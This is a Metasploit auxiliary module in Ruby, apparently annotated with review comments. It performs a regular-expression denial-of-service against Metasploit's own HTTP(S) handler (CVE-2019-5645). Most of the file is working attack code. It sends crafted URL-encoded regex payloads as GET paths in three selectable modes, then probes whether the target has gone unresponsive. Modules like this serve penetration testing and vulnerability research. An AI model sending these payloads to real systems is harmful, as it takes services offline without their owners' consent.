rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
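# Auxiliary DoS module for CVE-2019-5645. Per the module description below,
# request paths sent to a Metasploit HTTP(S) handler are added as resource
# handlers and evaluated as regular expressions by the handler server.
#
# Review notes:
# - The trigger requests in #dos use fixed literal paths, so they can be
#   matched in handler-side or proxy logs. The follow-up probe in
#   #test_service_unresponsive uses a random 8-letter path instead.
# - The description records testing against Metasploit 5.0.20. This file does
#   not state which release carries the fix; confirm against the CVE advisory.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos

  # Registers the module metadata and the single DOSTYPE option.
  #
  # @param info [Hash] metadata passed through to update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Metasploit HTTP(S) handler DoS',
        'Description' => %q{
          This module exploits the Metasploit HTTP(S) handler by sending
          a specially crafted HTTP request that gets added as a resource handler.
          Resources (which come from the external connections) are evaluated as RegEx
          in the handler server. Specially crafted input can trigger Gentle, Soft and Hard DoS.

          Tested against Metasploit 5.0.20.
        },
        'Author' => [
          'Jose Garduno, Dreamlab Technologies AG', # Vulnerability Discovery, Metasploit module.
          'Angelo Seiler, Dreamlab Technologies AG', # Additional research, debugging.
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2019-5645']
        ],
        'DisclosureDate' => '2019-09-04',
        'Notes' => {
          # The module declares that the target service is expected to go down.
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        # Defaults to HARD; the enum restricts input to the three listed values.
        OptEnum.new('DOSTYPE', [true, 'Type of DoS to trigger', 'HARD', %w[GENTLE SOFT HARD]])
      ]
    )
  end

  # Sends one GET to a random 8-letter path and reports whether the service
  # still answers. A nil response or a timeout is reported as success.
  def test_service_unresponsive
    print_status('Testing for service unresponsiveness.')

    res = send_request_cgi({
      'uri' => '/' + Rex::Text.rand_text_alpha(8),
      'method' => 'GET'
    })

    if res.nil?
      print_good('SUCCESS, Service not responding.')
    else
      print_error('Service responded with a valid HTTP Response; Attack failed.')
    end
  rescue ::Rex::ConnectionRefused
    # NOTE(review): a refused connection is reported as a generic error here,
    # although it may also mean the service is no longer listening.
    print_error('An unknown error occurred.')
  rescue ::Timeout::Error
    print_good('HTTP request timed out, most likely the ReDoS attack was successful.')
  end

  # Sends the request sequence selected by DOSTYPE and reports the outcome.
  # Request paths are reproduced verbatim from the original module.
  def dos
    case datastore['DOSTYPE']
    when 'HARD'
      send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri('/%2f%26%28%21%7c%23%2b%29%2b%40%32%30')
      )
      begin
        send_request_cgi(
          'method' => 'GET',
          'uri' => normalize_uri('/%26%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%21')
        )
      rescue ::Errno::EPIPE, ::Timeout::Error
        # Same exceptions the HttpClient mixin catches
      end
      test_service_unresponsive

    when 'SOFT'
      send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri('/%5b20')
      )

      test_service_unresponsive

    when 'GENTLE'
      send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri('/%2e%2a%7c%32%30%7c%5c')
      )

      sleep(1)

      send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri('/whatever')
      )

      resthree = send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri('/whatever2')
      )

      # send_request_cgi can return nil (test_service_unresponsive checks for
      # that), so guard before reading the body instead of raising
      # NoMethodError on a missing response.
      if resthree.nil? || resthree.body.empty?
        print_good('SUCCESS, Service not responding.')
      else
        print_error('Service responded with a valid HTTP Response; Attack failed.')
      end

    else
      # Defensive branch: the OptEnum above already limits DOSTYPE.
      fail_with Failure::BadConfig, 'Invalid DOSTYPE selected'
    end

    print_status('DOS request sent')
  end

  # Checks whether a connection to the target can be opened.
  # Not called from anywhere within this file.
  #
  # @return [Boolean] false when the connection is refused, true otherwise
  def is_alive?
    connect
    true
  rescue Rex::ConnectionRefused
    false
  ensure
    # Always release the socket, whether or not connect succeeded.
    disconnect
  end

  # Module entry point: announces the target and runs the selected DoS.
  def run
    print_status("#{rhost}:#{rport} - Sending DoS packet...")
    dos
  end

end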